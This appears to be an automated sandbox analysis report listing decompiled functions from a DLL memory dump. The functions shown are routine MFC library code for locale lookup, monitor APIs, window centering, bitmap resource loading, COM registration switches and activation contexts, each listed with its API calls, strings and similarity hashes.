ConvertDefaultLocale.KERNEL32(000003FF), ref: 10019E29
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 10019E42
EnumResourceLanguagesA.KERNEL32 ref: 10019E5F
ConvertDefaultLocale.KERNEL32(?), ref: 10019E92
ConvertDefaultLocale.KERNEL32(00000000), ref: 10019E9B
GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10019EDE
_memset.LIBCMT ref: 10019EFE

Strings

ntdll.dll, xrefs: 10019E3D
kernel32.dll, xrefs: 10019D63
GetUserDefaultUILanguage, xrefs: 10019D82
GetSystemDefaultUILanguage, xrefs: 10019DDA

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 3537336938-2299501126
Opcode ID: b1313598082af550f163fe578bb25425ca75b59cc03dd955cb8d94d12b35e60a
Instruction ID: 011611a17439ec53fdba5a735ab8fe6c752bbb1b1d392e61b9aa23fbffeeb9a6
Opcode Fuzzy Hash: b1313598082af550f163fe578bb25425ca75b59cc03dd955cb8d94d12b35e60a
Instruction Fuzzy Hash: 83512671D002289BDB64DF65DC85BEDBAF4EB49300F1041EAE948E7290DB759E85CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000C040, Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 78
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E1000C040() {
				void* __ebx;
				void* __esi;
				void* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				signed int _t16;
				signed int _t17;
				struct HINSTANCE__* _t19;
				void* _t21;
				void* _t24;
				void* _t25;

				_t17 = _t16 ^ _t16;
				_t24 =  *0x10094134 - _t17; // 0x0
				if(_t24 == 0) {
					_push(_t21);
					 *0x10094138 = E1000BFE6(_t17, _t21, __eflags);
					_t19 = GetModuleHandleA("USER32");
					__eflags = _t19 - _t17;
					if(_t19 == _t17) {
						L12:
						 *0x10094118 = _t17;
						 *0x1009411c = _t17;
						 *0x10094120 = _t17;
						 *0x10094124 = _t17;
						 *0x10094128 = _t17;
						 *0x1009412c = _t17;
						 *0x10094130 = _t17;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t19, "GetSystemMetrics");
						 *0x10094118 = _t6;
						__eflags = _t6 - _t17;
						if(_t6 == _t17) {
							goto L12;
						} else {
							_t7 = GetProcAddress(_t19, "MonitorFromWindow");
							 *0x1009411c = _t7;
							__eflags = _t7 - _t17;
							if(_t7 == _t17) {
								goto L12;
							} else {
								_t8 = GetProcAddress(_t19, "MonitorFromRect");
								 *0x10094120 = _t8;
								__eflags = _t8 - _t17;
								if(_t8 == _t17) {
									goto L12;
								} else {
									_t9 = GetProcAddress(_t19, "MonitorFromPoint");
									 *0x10094124 = _t9;
									__eflags = _t9 - _t17;
									if(_t9 == _t17) {
										goto L12;
									} else {
										_t10 = GetProcAddress(_t19, "EnumDisplayMonitors");
										 *0x1009412c = _t10;
										__eflags = _t10 - _t17;
										if(_t10 == _t17) {
											goto L12;
										} else {
											_t11 = GetProcAddress(_t19, "GetMonitorInfoA");
											 *0x10094128 = _t11;
											__eflags = _t11 - _t17;
											if(_t11 == _t17) {
												goto L12;
											} else {
												_t12 = GetProcAddress(_t19, "EnumDisplayDevicesA");
												 *0x10094130 = _t12;
												__eflags = _t12 - _t17;
												if(_t12 == _t17) {
													goto L12;
												} else {
													_t5 = 1;
													__eflags = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					 *0x10094134 = 1;
					return _t5;
				} else {
					_t25 =  *0x10094128 - _t17; // 0x0
					return 0 | _t25 != 0x00000000;
				}
			}

0x1000c043
0x1000c045
0x1000c04b
0x1000c05a
0x1000c066
0x1000c071
0x1000c073
0x1000c075
0x1000c109
0x1000c109
0x1000c10f
0x1000c115
0x1000c11b
0x1000c121
0x1000c127
0x1000c12d
0x1000c133
0x1000c07b
0x1000c087
0x1000c089
0x1000c08e
0x1000c090
0x00000000
0x1000c092
0x1000c098
0x1000c09a
0x1000c09f
0x1000c0a1
0x00000000
0x1000c0a3
0x1000c0a9
0x1000c0ab
0x1000c0b0
0x1000c0b2
0x00000000
0x1000c0b4
0x1000c0ba
0x1000c0bc
0x1000c0c1
0x1000c0c3
0x00000000
0x1000c0c5
0x1000c0cb
0x1000c0cd
0x1000c0d2
0x1000c0d4
0x00000000
0x1000c0d6
0x1000c0dc
0x1000c0de
0x1000c0e3
0x1000c0e5
0x00000000
0x1000c0e7
0x1000c0ed
0x1000c0ef
0x1000c0f4
0x1000c0f6
0x00000000
0x1000c0f8
0x1000c0fa
0x1000c0fa
0x1000c0fa
0x1000c0f6
0x1000c0e5
0x1000c0d4
0x1000c0c3
0x1000c0b2
0x1000c0a1
0x1000c090
0x1000c0fd
0x1000c108
0x1000c04d
0x1000c04f
0x1000c059
0x1000c059

APIs

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,745F5D80,1000C195,?,?,?,?,?,?,?,1000E6A2,00000000,00000002,00000028), ref: 1000C06B
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 1000C087
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 1000C098
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 1000C0A9
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 1000C0BA
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 1000C0CB
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 1000C0DC
GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 1000C0ED

Strings

MonitorFromPoint, xrefs: 1000C0B4
MonitorFromRect, xrefs: 1000C0A3
GetMonitorInfoA, xrefs: 1000C0D6
EnumDisplayDevicesA, xrefs: 1000C0E7
GetSystemMetrics, xrefs: 1000C081
USER32, xrefs: 1000C061
MonitorFromWindow, xrefs: 1000C092
EnumDisplayMonitors, xrefs: 1000C0C5

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-68207542
Opcode ID: 225bf975c0c348753a5e6d4c7ebafcba2d5644028783a22fa95648510394d5bb
Instruction ID: ab183aadd53b8730ac2df022d300642cd31276bfe57814617c7b848495a541de
Opcode Fuzzy Hash: 225bf975c0c348753a5e6d4c7ebafcba2d5644028783a22fa95648510394d5bb
Instruction Fuzzy Hash: B2215E719102349BE704DF799CD4C697AE8F35E291723083FE20DD3125EBB044C59E84

Uniqueness

Uniqueness Score: -1.00%

Function 1000E5B2, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 175
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1000E5B2(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				void* __edi;
				intOrPtr _t58;
				struct HWND__* _t59;
				intOrPtr _t94;
				signed int _t103;
				struct HWND__* _t104;
				void* _t105;
				struct HWND__* _t107;
				long _t108;
				long _t116;
				void* _t119;
				struct HWND__* _t121;
				void* _t123;
				intOrPtr _t125;
				intOrPtr _t129;

				_t119 = __edx;
				_t105 = __ebx;
				_t125 = __ecx;
				_v12 = __ecx;
				_v8 = E10012193(__ecx);
				_t58 = _a4;
				if(_t58 == 0) {
					if((_v8 & 0x40000000) == 0) {
						_t59 = GetWindow( *(__ecx + 0x20), 4);
					} else {
						_t59 = GetParent( *(__ecx + 0x20));
					}
					_t121 = _t59;
					if(_t121 != 0) {
						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
						if(_t104 != 0) {
							_t121 = _t104;
						}
					}
				} else {
					_t4 = _t58 + 0x20; // 0xc033d88b
					_t121 =  *_t4;
				}
				_push(_t105);
				GetWindowRect( *(_t125 + 0x20),  &_v60);
				if((_v8 & 0x40000000) != 0) {
					_t107 = GetParent( *(_t125 + 0x20));
					GetClientRect(_t107,  &_v28);
					GetClientRect(_t121,  &_v44);
					MapWindowPoints(_t121, _t107,  &_v44, 2);
				} else {
					if(_t121 != 0) {
						_t103 = GetWindowLongA(_t121, 0xfffffff0);
						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
							_t121 = 0;
						}
					}
					_v100 = 0x28;
					if(_t121 != 0) {
						GetWindowRect(_t121,  &_v44);
						E1000C1F5(_t121, E1000C188(_t121, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t94 = E10003110();
						if(_t94 != 0) {
							_t94 =  *((intOrPtr*)(_t94 + 0x20));
						}
						E1000C1F5(_t121, E1000C188(_t94, 1),  &_v100);
						CopyRect( &_v44,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t108 = _v60.left;
				asm("cdq");
				_t123 = _v60.right - _t108;
				asm("cdq");
				_t120 = _v44.bottom;
				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
				_a4 = _v60.bottom - _v60.top;
				asm("cdq");
				asm("cdq");
				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
				if(_t123 + _t116 > _v28.right) {
					_t116 = _t108 - _v60.right + _v28.right;
				}
				if(_t116 < _v28.left) {
					_t116 = _v28.left;
				}
				if(_a4 + _t129 > _v28.bottom) {
					_t129 = _v60.top - _v60.bottom + _v28.bottom;
				}
				if(_t129 < _v28.top) {
					_t129 = _v28.top;
				}
				return E1001254C(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
			}

0x1000e5b2
0x1000e5b2
0x1000e5bb
0x1000e5be
0x1000e5c6
0x1000e5c9
0x1000e5ce
0x1000e5dc
0x1000e5ee
0x1000e5de
0x1000e5e1
0x1000e5e1
0x1000e5f4
0x1000e5f8
0x1000e604
0x1000e60c
0x1000e60e
0x1000e60e
0x1000e60c
0x1000e5d0
0x1000e5d0
0x1000e5d0
0x1000e5d0
0x1000e610
0x1000e61e
0x1000e627
0x1000e6c7
0x1000e6ce
0x1000e6d5
0x1000e6df
0x1000e62d
0x1000e62f
0x1000e634
0x1000e63f
0x1000e648
0x1000e648
0x1000e63f
0x1000e64a
0x1000e653
0x1000e694
0x1000e6a3
0x1000e6b0
0x1000e655
0x1000e655
0x1000e65c
0x1000e65e
0x1000e65e
0x1000e66e
0x1000e681
0x1000e68b
0x1000e68b
0x1000e653
0x1000e6ee
0x1000e6f3
0x1000e6f8
0x1000e6fc
0x1000e6ff
0x1000e706
0x1000e710
0x1000e718
0x1000e720
0x1000e727
0x1000e72c
0x1000e734
0x1000e734
0x1000e73a
0x1000e73c
0x1000e73c
0x1000e747
0x1000e74f
0x1000e74f
0x1000e755
0x1000e757
0x1000e757
0x1000e76f

APIs

Part of subcall function 10012193: GetWindowLongA.USER32 ref: 1001219E

GetParent.USER32(?), ref: 1000E5E1
SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 1000E604
GetWindowRect.USER32 ref: 1000E61E
GetWindowLongA.USER32 ref: 1000E634
CopyRect.USER32 ref: 1000E681
CopyRect.USER32 ref: 1000E68B
GetWindowRect.USER32 ref: 1000E694
CopyRect.USER32 ref: 1000E6B0

Strings

(, xrefs: 1000E64A

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID: (
API String ID: 808654186-3887548279
Opcode ID: 4a1cf83235c697c5a427f10a73d954b2e227418abe2c41637a54a60a6ed6c3f5
Instruction ID: 528b8e0500560b116ccfb4cbc7bfd7b8107b87ac99f111d8733642f7c3ed0734
Opcode Fuzzy Hash: 4a1cf83235c697c5a427f10a73d954b2e227418abe2c41637a54a60a6ed6c3f5
Instruction Fuzzy Hash: A3515F72900619ABEB01CBA8DC85EEEBBB9EF48394F154614F915F3295EB30ED418B50

Uniqueness

Uniqueness Score: -1.00%

Function 1001481E, Relevance: 22.6, APIs: 15, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E1001481E(signed int _a4, signed int _a8, int _a12) {
				BITMAPINFO* _v8;
				struct HDC__* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t53;
				BITMAPINFO* _t54;
				BITMAPINFO* _t59;
				signed char _t63;
				struct HDC__* _t69;
				struct HBITMAP__* _t70;
				void* _t74;
				struct HDC__* _t75;
				struct HWND__* _t84;
				intOrPtr* _t92;
				void* _t97;
				signed int _t98;
				intOrPtr _t102;
				int* _t103;
				int _t104;
				BITMAPINFO* _t107;

				_t53 = LoadResource(_a4, _a8);
				_t84 = 0;
				_v24 = _t53;
				if(_t53 != 0) {
					_t54 = LockResource(_t53);
					_v8 = _t54;
					__eflags = _t54;
					if(_t54 == 0) {
						goto L1;
					}
					_t101 = _t54->bmiHeader + 0x40;
					_t107 = E1003F999(0, _t97, _t54->bmiHeader + 0x40, _t54->bmiHeader + 0x40);
					__eflags = _t107;
					if(_t107 != 0) {
						E10003B00(_t101, _t107, _t107, _t101, _v8, _t101);
						_t59 = _t107 + _t107->bmiHeader;
						__eflags = _t59;
						_v12 = _t59;
						_a8 = 0;
						do {
							_t92 = _t59 + _a8 * 4;
							_t102 =  *_t92;
							_t98 = 0;
							__eflags = 0;
							_v16 = _t92;
							while(1) {
								__eflags = _t102 -  *((intOrPtr*)(0x10057bac + _t98 * 8));
								if(_t102 ==  *((intOrPtr*)(0x10057bac + _t98 * 8))) {
									break;
								}
								_t98 = _t98 + 1;
								__eflags = _t98 - 4;
								if(_t98 < 4) {
									continue;
								}
								goto L14;
							}
							__eflags = _a12 - _t84;
							if(_a12 == _t84) {
								_t103 = 0x10057bb0 + _t98 * 8;
								_a4 = GetSysColor( *_t103) >> 0x00000008 & 0x000000ff;
								_t63 = GetSysColor( *_t103);
								 *_v16 = GetSysColor( *_t103) >> 0x00000010 & 0x000000ff | ((_t63 & 0x000000ff) << 0x00000008 | _a4) << 0x00000008;
								_t59 = _v12;
								_t84 = 0;
								__eflags = 0;
							} else {
								__eflags =  *(0x10057bb0 + _t98 * 8) - 0x12;
								if( *(0x10057bb0 + _t98 * 8) != 0x12) {
									 *_t92 = 0xffffff;
								}
							}
							L14:
							_a8 = _a8 + 1;
							__eflags = _a8 - 0x10;
						} while (_a8 < 0x10);
						_t104 = _t107->bmiHeader.biWidth;
						_a12 = _t104;
						_a8 = _t107->bmiHeader.biHeight;
						_t69 = GetDC(_t84);
						_v12 = _t69;
						_t70 = CreateCompatibleBitmap(_t69, _t104, _a8);
						_v16 = _t70;
						__eflags = _t70 - _t84;
						if(__eflags != 0) {
							_t75 = CreateCompatibleDC(_v12);
							_t104 = SelectObject;
							_a4 = _t75;
							_v20 = SelectObject(_t75, _v16);
							__eflags = 1;
							StretchDIBits(_a4, _t84, _t84, _a12, _a8, _t84, _t84, _a12, _a8, _v8 + 0x28 + (1 << _t107->bmiHeader.biBitCount) * 4, _t107, _t84, 0xcc0020);
							SelectObject(_a4, _v20);
							DeleteDC(_a4);
						}
						ReleaseDC(_t84, _v12);
						_push(_t107);
						E1003F6C3(_t84, _t104, _t107, __eflags);
						FreeResource(_v24);
						_t74 = _v16;
						goto L18;
					} else {
						_t74 = 0;
						L18:
						return _t74;
					}
				}
				L1:
				return 0;
			}

0x1001482d
0x10014833
0x10014835
0x1001483a
0x10014844
0x1001484a
0x1001484d
0x1001484f
0x00000000
0x00000000
0x10014855
0x1001485e
0x10014861
0x10014863
0x10014872
0x1001487c
0x1001487c
0x1001487e
0x10014881
0x10014884
0x10014887
0x1001488a
0x1001488c
0x1001488c
0x1001488e
0x10014891
0x10014891
0x10014898
0x00000000
0x00000000
0x1001489a
0x1001489b
0x1001489e
0x00000000
0x00000000
0x00000000
0x100148a0
0x100148a2
0x100148a5
0x100148bf
0x100148d2
0x100148d5
0x100148f6
0x100148f8
0x100148fb
0x100148fb
0x100148a7
0x100148a7
0x100148af
0x100148b1
0x100148b1
0x100148af
0x100148fd
0x100148fd
0x10014900
0x10014900
0x1001490a
0x10014911
0x10014914
0x10014917
0x10014920
0x10014925
0x1001492b
0x1001492e
0x10014930
0x10014935
0x1001493e
0x10014945
0x10014952
0x1001495a
0x10014977
0x10014983
0x10014988
0x10014988
0x10014992
0x10014998
0x10014999
0x100149a2
0x100149a8
0x00000000
0x10014865
0x10014865
0x100149ab
0x00000000
0x100149ac
0x10014863
0x1001483c
0x00000000

APIs

LoadResource.KERNEL32(10008152,?,00000000,?,?,?,10008152,?,?,?,0000E800,?), ref: 1001482D
LockResource.KERNEL32(00000000,?,10008152,?,?,?,0000E800,?), ref: 10014844
_malloc.LIBCMT ref: 10014859

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$LoadLock_malloc
String ID:
API String ID: 2582927105-0
Opcode ID: 6f951dfa84c84794d7d1931dc600e3186fa94c573924a51bb2c8e4994114569b
Instruction ID: 90e6685fe3ab67299a77f04a2aaa943ac06e0f29c1e47460936ea79f1b6a65f7
Opcode Fuzzy Hash: 6f951dfa84c84794d7d1931dc600e3186fa94c573924a51bb2c8e4994114569b
Instruction Fuzzy Hash: 27515872900269FFEB019FA5CC848AEBBB9FF48354B118529FA159B120DB31DA51DF60

Uniqueness

Uniqueness Score: -1.00%

Function 10019ADF, Relevance: 21.1, APIs: 3, Strings: 11, Instructions: 123
stringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E10019ADF(void* __ecx, CHAR* _a4) {
				int _t14;
				int _t15;
				void* _t16;
				void* _t17;
				void* _t18;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t23;
				CHAR* _t24;
				void* _t41;
				void* _t43;
				void* _t45;
				void* _t47;

				_t24 = _a4;
				_t47 = __ecx;
				_t14 = lstrcmpA(_t24, "pt");
				if(_t14 == 0) {
					 *((intOrPtr*)(_t47 + 0x14)) = 3;
					return _t14;
				}
				_t15 = lstrcmpA(_t24, "p");
				if(_t15 == 0) {
					 *((intOrPtr*)(_t47 + 0x14)) = 2;
					return _t15;
				}
				_t16 = E1000D4C9(_t24, "Register");
				if(_t16 == 0) {
					L22:
					 *((intOrPtr*)(_t47 + 0x14)) = 5;
					return _t16;
				}
				_t16 = E1000D4C9(_t24, "Regserver");
				if(_t16 == 0) {
					goto L22;
				}
				_t16 = E1000D4C9(_t24, "RegisterPerUser");
				if(_t16 == 0) {
					L21:
					 *((intOrPtr*)(_t47 + 0x10)) = 1;
					goto L22;
				}
				_t16 = E1000D4C9(_t24, "RegserverPerUser");
				if(_t16 == 0) {
					goto L21;
				}
				_t17 = E1000D4C9(_t24, "Unregister");
				if(_t17 == 0) {
					L20:
					 *((intOrPtr*)(_t47 + 0x14)) = 6;
					return _t17;
				}
				_t17 = E1000D4C9(_t24, "Unregserver");
				if(_t17 == 0) {
					goto L20;
				}
				_t18 = E1000D4C9(_t24, "UnregisterPerUser");
				if(_t18 == 0) {
					L19:
					 *((intOrPtr*)(_t47 + 0x14)) = 6;
					 *((intOrPtr*)(_t47 + 0x10)) = 1;
					return _t18;
				}
				_t18 = E1000D4C9(_t24, "UnregserverPerUser");
				_pop(_t41);
				if(_t18 == 0) {
					goto L19;
				}
				if(lstrcmpA(_t24, "dde") == 0) {
					_t23 = E10029DBA(_t41, _t19);
					 *((intOrPtr*)(_t47 + 0x14)) = 4;
					return _t23;
				}
				_t20 = E1000D4C9(_t24, "Embedding");
				_pop(_t43);
				if(_t20 == 0) {
					_t22 = E10029DBA(_t43, _t20);
					 *((intOrPtr*)(_t47 + 8)) = 1;
					L16:
					 *(_t47 + 4) =  *(_t47 + 4) & 0x00000000;
					return _t22;
				}
				_t21 = E1000D4C9(_t24, "Automation");
				_pop(_t45);
				if(_t21 == 0) {
					_t22 = E10029DBA(_t45, _t21);
					 *((intOrPtr*)(_t47 + 0xc)) = 1;
					goto L16;
				}
				return _t21;
			}

0x10019ae5
0x10019af6
0x10019af8
0x10019afc
0x10019afe
0x00000000
0x10019afe
0x10019b10
0x10019b14
0x10019b16
0x00000000
0x10019b16
0x10019b28
0x10019b31
0x10019c41
0x10019c41
0x00000000
0x10019c41
0x10019b3d
0x10019b46
0x00000000
0x00000000
0x10019b52
0x10019b5b
0x10019c3a
0x10019c3a
0x00000000
0x10019c3a
0x10019b67
0x10019b70
0x00000000
0x00000000
0x10019b7c
0x10019b85
0x10019c31
0x10019c31
0x00000000
0x10019c31
0x10019b91
0x10019b9a
0x00000000
0x00000000
0x10019ba6
0x10019baf
0x10019c21
0x10019c21
0x10019c28
0x00000000
0x10019c28
0x10019bb7
0x10019bbd
0x10019bc0
0x00000000
0x00000000
0x10019bcc
0x10019bcf
0x10019bd4
0x00000000
0x10019bd4
0x10019be3
0x10019be9
0x10019bec
0x10019bef
0x10019bf4
0x10019bfb
0x10019bfb
0x00000000
0x10019bfb
0x10019c07
0x10019c0d
0x10019c10
0x10019c13
0x10019c18
0x00000000
0x10019c18
0x10019c4c

APIs

lstrcmpA.KERNEL32(?,100591E4), ref: 10019AF8
lstrcmpA.KERNEL32(?,100591E0), ref: 10019B10

Strings

Automation, xrefs: 10019C01
Unregserver, xrefs: 10019B8B
Regserver, xrefs: 10019B37
UnregisterPerUser, xrefs: 10019BA0
Unregister, xrefs: 10019B76
RegserverPerUser, xrefs: 10019B61
UnregserverPerUser, xrefs: 10019BB1
Embedding, xrefs: 10019BDD
dde, xrefs: 10019BC2
Register, xrefs: 10019B22
RegisterPerUser, xrefs: 10019B4C

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcmp
String ID: Automation$Embedding$Register$RegisterPerUser$Regserver$RegserverPerUser$Unregister$UnregisterPerUser$Unregserver$UnregserverPerUser$dde
API String ID: 1534048567-3876351261
Opcode ID: 1e1e7a024f9d29b275806b0812bbdf9ccbabd6b90dc195ab3a83e0f82c483bde
Instruction ID: 4cac69e55d2ba8ca1dd4df803677293457e46a9220760729bd2088f07bf3686e
Opcode Fuzzy Hash: 1e1e7a024f9d29b275806b0812bbdf9ccbabd6b90dc195ab3a83e0f82c483bde
Instruction Fuzzy Hash: AE3109B6108B033AF714D631BDA5B8B23DCDB122E6F11580BF5459A4C6DF39F48886B4

Uniqueness

Uniqueness Score: -1.00%

Function 100193EC, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 60
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E100193EC(intOrPtr __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t5;
				_Unknown_base(*)()* _t10;
				struct HINSTANCE__* _t18;
				void* _t19;
				char _t21;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;
				_Unknown_base(*)()* _t25;

				_push(__ecx);
				_t5 = __ecx;
				_t16 = _a4;
				 *((intOrPtr*)(__ecx)) = _a4;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				_v8 = __ecx;
				_t21 =  *0x100942c4; // 0x0
				if(_t21 == 0) {
					_push(_t19);
					_t18 = GetModuleHandleA("KERNEL32");
					_t22 = _t18;
					if(_t18 == 0) {
						L2:
						E1000A5CD(0, _t16, _t18, _t19, _t22);
					}
					 *0x100942b4 = GetProcAddress(_t18, "CreateActCtxA");
					 *0x100942b8 = GetProcAddress(_t18, "ReleaseActCtx");
					 *0x100942bc = GetProcAddress(_t18, "ActivateActCtx");
					_t10 = GetProcAddress(_t18, "DeactivateActCtx");
					_pop(_t18);
					 *0x100942c0 = _t10;
					_pop(_t19);
					_t23 =  *0x100942b4; // 0x0
					if(_t23 == 0) {
						__eflags =  *0x100942b8; // 0x0
						if(__eflags != 0) {
							goto L2;
						} else {
							__eflags =  *0x100942bc; // 0x0
							if(__eflags != 0) {
								goto L2;
							} else {
								__eflags = _t10;
								if(__eflags != 0) {
									goto L2;
								}
							}
						}
					} else {
						_t24 =  *0x100942b8; // 0x0
						if(_t24 == 0) {
							goto L2;
						} else {
							_t25 =  *0x100942bc; // 0x0
							if(_t25 == 0) {
								goto L2;
							} else {
								_t22 = _t10;
								if(_t10 == 0) {
									goto L2;
								}
							}
						}
					}
					_t5 = _v8;
					 *0x100942c4 = 1;
				}
				return _t5;
			}

0x100193f1
0x100193f2
0x100193f4
0x100193fa
0x100193fc
0x100193ff
0x10019402
0x10019408
0x1001940e
0x1001941b
0x1001941d
0x1001941f
0x10019421
0x10019421
0x10019421
0x1001943a
0x10019447
0x10019454
0x10019459
0x1001945b
0x1001945c
0x10019461
0x10019462
0x10019468
0x10019480
0x10019486
0x00000000
0x10019488
0x10019488
0x1001948e
0x00000000
0x10019490
0x10019490
0x10019492
0x00000000
0x00000000
0x10019492
0x1001948e
0x1001946a
0x1001946a
0x10019470
0x00000000
0x10019472
0x10019472
0x10019478
0x00000000
0x1001947a
0x1001947a
0x1001947c
0x00000000
0x1001947e
0x1001947c
0x10019478
0x10019470
0x10019494
0x10019497
0x10019497
0x100194a0

APIs

GetModuleHandleA.KERNEL32(KERNEL32), ref: 10019415
GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 10019432
GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 1001943F
GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 1001944C
GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 10019459

Strings

CreateActCtxA, xrefs: 1001942C
ActivateActCtx, xrefs: 10019441
ReleaseActCtx, xrefs: 10019434
KERNEL32, xrefs: 10019410
DeactivateActCtx, xrefs: 1001944E

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
